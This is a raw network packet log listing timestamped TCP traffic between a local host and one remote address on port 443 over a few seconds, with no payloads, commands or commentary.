Sep 27, 2024 00:28:49.713577032 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:49.713722944 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:49.713746071 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:49.713805914 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:49.791526079 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:49.791559935 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:49.791708946 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:49.791737080 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:49.791788101 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:49.829185963 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:49.829205990 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:49.829435110 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:49.829452038 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:49.829494953 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:49.877378941 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:49.877399921 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:49.877612114 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:49.877634048 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:49.877708912 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:49.911478996 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:49.911504984 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:49.911670923 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:49.911685944 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:49.911736965 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:49.955017090 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:49.955040932 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:49.955204010 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:49.955221891 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:49.955317974 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:49.972872972 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:49.972892046 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:49.972992897 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:49.973012924 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:49.973330021 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:49.995129108 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:49.995140076 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:49.995234013 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:49.995244026 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:49.995440960 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:50.020222902 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:50.020241022 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:50.020503044 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:50.020515919 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:50.020613909 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:50.047970057 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:50.047991037 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:50.048724890 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:50.048738003 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:50.048810005 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:50.060527086 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:50.060551882 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:50.061192989 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:50.061207056 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:50.061485052 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:50.078562021 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:50.078587055 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:50.078716993 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:50.078727007 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:50.079020977 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:50.103163958 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:50.103187084 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:50.103401899 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:50.103418112 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:50.103461027 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:50.121546984 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:50.121567965 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:50.121736050 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:50.121756077 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:50.121822119 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:50.135927916 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:50.135966063 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:50.136013985 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:50.136020899 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:50.136068106 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:50.136158943 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:50.136739969 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:50.136755943 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:50.137402058 CEST	57892	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:50.137434006 CEST	443	57892	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:50.137520075 CEST	57892	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:50.137860060 CEST	57892	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:50.137871981 CEST	443	57892	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:50.789068937 CEST	443	57892	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:50.789134979 CEST	57892	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:50.789690018 CEST	57892	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:50.789697886 CEST	443	57892	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:50.792064905 CEST	57892	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:50.792072058 CEST	443	57892	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:51.219871998 CEST	443	57892	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:51.219898939 CEST	443	57892	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:51.219913006 CEST	443	57892	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:51.220166922 CEST	57892	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:51.220168114 CEST	57892	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:51.220184088 CEST	443	57892	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:51.220242977 CEST	57892	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:51.250638008 CEST	443	57892	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:51.250662088 CEST	443	57892	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:51.250901937 CEST	57892	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:51.250916004 CEST	443	57892	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:51.250958920 CEST	57892	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:51.317966938 CEST	443	57892	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:51.317994118 CEST	443	57892	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:51.318226099 CEST	57892	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:51.318243027 CEST	443	57892	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:51.318289042 CEST	57892	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:51.358371973 CEST	443	57892	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:51.358396053 CEST	443	57892	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:51.358459949 CEST	57892	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:51.358473063 CEST	443	57892	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:51.358484983 CEST	57892	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:51.358517885 CEST	57892	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:51.385390997 CEST	443	57892	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:51.385441065 CEST	443	57892	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:51.385478973 CEST	443	57892	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:51.385481119 CEST	57892	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:51.385500908 CEST	57892	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:51.385526896 CEST	57892	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:51.385837078 CEST	57892	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:51.385852098 CEST	443	57892	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:51.386797905 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:51.386845112 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:51.386953115 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:51.387160063 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:51.387172937 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.068373919 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.068485022 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.069087029 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.069098949 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.071228981 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.071239948 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.514735937 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.514760971 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.514776945 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.514822960 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.514858961 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.514868975 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.514923096 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.546129942 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.546158075 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.546216965 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.546228886 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.546250105 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.546272993 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.615250111 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.615278006 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.615376949 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.615407944 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.615453959 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.645674944 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.645701885 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.645948887 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.645967960 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.646042109 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.683244944 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.683273077 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.683432102 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.683451891 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.683511019 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.715410948 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.715439081 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.715591908 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.715609074 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.715660095 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.735125065 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.735152006 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.735404968 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.735435963 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.735498905 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.753901958 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.753930092 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.754050970 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.754070044 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.754120111 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.771358013 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.771393061 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.771481037 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.771491051 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.771539927 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.786318064 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.786348104 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.786482096 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.786494970 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.786541939 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.803416014 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.803442001 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.803533077 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.803543091 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.803591967 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.817148924 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.817177057 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.817277908 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.817286015 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.817332983 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.833110094 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.833137989 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.833220959 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.833231926 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.833281040 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.844820023 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.844846964 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.844959021 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.844969034 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.845040083 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.853665113 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.853688002 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.853796005 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.853812933 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.853861094 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.863497019 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.863521099 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.863600016 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.863607883 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.863656044 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.874541044 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.874564886 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.874640942 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.874650002 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.874694109 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.879900932 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.879923105 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.880011082 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.880017996 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.880067110 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.890548944 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.890575886 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.890660048 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.890669107 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.890726089 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.909498930 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.909531116 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.909626961 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.909636021 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.909679890 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.925877094 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.925904989 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.926000118 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.926018000 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.926074028 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.937027931 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.937052011 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.937149048 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.937160015 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.937206030 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.945966959 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.945993900 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.946078062 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.946090937 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.946136951 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.955972910 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.955998898 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.956103086 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.956118107 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.956167936 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.966665983 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.966691971 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.966806889 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.966820955 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.966869116 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.972316027 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.972338915 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.972431898 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.972445965 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.972503901 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.983146906 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.983170986 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.983273029 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:52.983283997 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:52.983333111 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.001961946 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.001986980 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.002074957 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.002084017 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.002126932 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.017935038 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.017959118 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.018090010 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.018106937 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.018162966 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.029495955 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.029522896 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.029633045 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.029643059 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.029694080 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.038363934 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.038393974 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.038491964 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.038500071 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.038542032 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.051496983 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.051518917 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.051616907 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.051625013 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.051671982 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.059070110 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.059089899 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.059282064 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.059288979 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.059333086 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.064750910 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.064769983 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.064913988 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.064923048 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.065002918 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.075331926 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.075351000 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.075403929 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.075411081 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.075448036 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.075462103 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.094347000 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.094366074 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.094496012 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.094505072 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.094547987 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.119441032 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.119462967 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.119544029 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.119560003 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.119606972 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.121903896 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.121921062 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.122114897 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.122123003 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.122164011 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.131066084 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.131093025 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.131138086 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.131145954 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.131176949 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.131196976 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.143841028 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.143867970 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.143944025 CEST	57893	443	192.168.2.6	5.75.211.162
